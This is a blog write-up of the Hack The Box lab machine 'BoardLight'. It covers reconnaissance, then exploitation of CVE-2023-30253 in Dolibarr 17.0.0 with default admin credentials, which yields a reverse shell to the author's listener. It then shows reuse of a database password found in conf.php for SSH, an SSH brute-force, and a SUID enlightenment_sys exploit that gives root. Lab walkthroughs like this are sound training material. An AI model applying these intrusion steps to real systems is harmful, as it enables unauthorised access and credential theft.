iconBjarne Verschorre

../board-light.md
Room Banner
🔗 https://app.hackthebox.com/machines/boardlight

Reconnaissance

Nmap

A simple nmap shows that this box runs a webserver on port 80 and a ssh server on port 22.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Directory enumeration

Tried to enumerate directories with gobuster but didn’t find anything interesting.

Website

The website looks pretty “useless”, meaning there’s nothing to interact with. At the bottom you see an email “info@board.htb”. This gives us the domain name. I’ve added this to my /etc/hosts file, reloaded the page and nothing changed so I’m not gonna bother with it.

VHOST enumeration

Since the website is pretty empty and directory enumeration didn’t give us anything, I tried VHOST enumeration:

$ ffuf -u http://10.10.11.11/ -H 'Host: FUZZ.board.htb' -w /opt/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 15949

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.11/
 :: Wordlist         : FUZZ: /opt/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 15949
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 70ms]

We got a hit on crm.board.htb. Let’s add this to our /etc/hosts file.

Dolibarr

The CRM software is Dolibarr.

dolibarr.png
Dolibarr.png

It looks like the version 17.0.0 is vulnerable.

Exploitation

CVE-2023-30253

For this exploit you need to have valid credentials. I’ve tried the default admin/admin and it worked.

$ python3 exploit.py http://crm.board.htb admin admin 10.10.15.44 9001
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

$ python3 -m pwncat -lp 9001
[10:46:26] Welcome to pwncat 🐈!
[10:47:12] received connection from 10.10.11.11:42356
[10:47:13] 10.10.11.11:42356: registered new host w/ db
(local) pwncat$ _
Active Session: 10.10.11.11:42356

We’re logged in as www-data in /var/www/html/crm.board.htb/htdocs/public/website/. Doing $ ls /home/ shows us that there’s a user larissa. We can’t read the users home directory so to be efficient I’m going to start a brute force attack on the user larissa via SSH while I continue to enumerate the system.

lateral movement

I found a database config file in /var/www/html/crm.board.htb/htdocs/conf/conf.php

$ cat conf.php
<SNIP>
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
<SNIP>

Now we have database credentials. The first thing I did was try the password on the user larissa via SSH and it worked. Now we can read the user flag.

Privilege escalation

I’m using linpeas to enumerate the system.

larissa@boardlight:~$ cd /dev/shm

I’m using PwnCat to upload linpeas to the system.

(local) pwncat$ upload linpeas.sh
[11:10:13] uploaded 862.78KiB in 0.89 seconds

larissa@boardlight:/dev/shm$ chmod +x linpeas.sh
larissa@boardlight:/dev/shm$ ./linpeas.sh

Nothing really stuck out except for some SUID binaries.

══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)

Shell as root

A quick search shows that enlightenment_sys is vulnerable to a privilege escalation. Uploading the exploit via PwnCat and running it gives us a root shell.

[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
# _
← Hacker vs Hacker Headless →